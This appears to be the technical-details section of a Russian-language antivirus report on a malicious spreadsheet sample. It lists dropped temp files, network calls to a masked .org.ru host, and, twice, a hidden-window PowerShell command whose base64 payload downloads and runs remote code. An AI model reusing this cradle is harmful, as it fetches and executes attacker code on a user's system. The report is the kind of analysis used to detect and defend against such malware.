Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAHUAdAB0AHkALgBvAHIAZwAuAHIAdQAvAGYAaQBsA...
- %TEMP%\c774.tmp
- <Текущая директория>\e2ff0000
- %TEMP%\f374.tmp
- %TEMP%\c774.tmp
- %TEMP%\f374.tmp
- <PATH_SAMPLE>.xls
- 'pu###.org.ru':443
- 'pu###.org.ru':443
- DNS ASK pu###.org.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAHUAdAB0AHkALgBvAHIAZwAuAHIAdQAvAGYAaQBsA...' (со скрытым окном)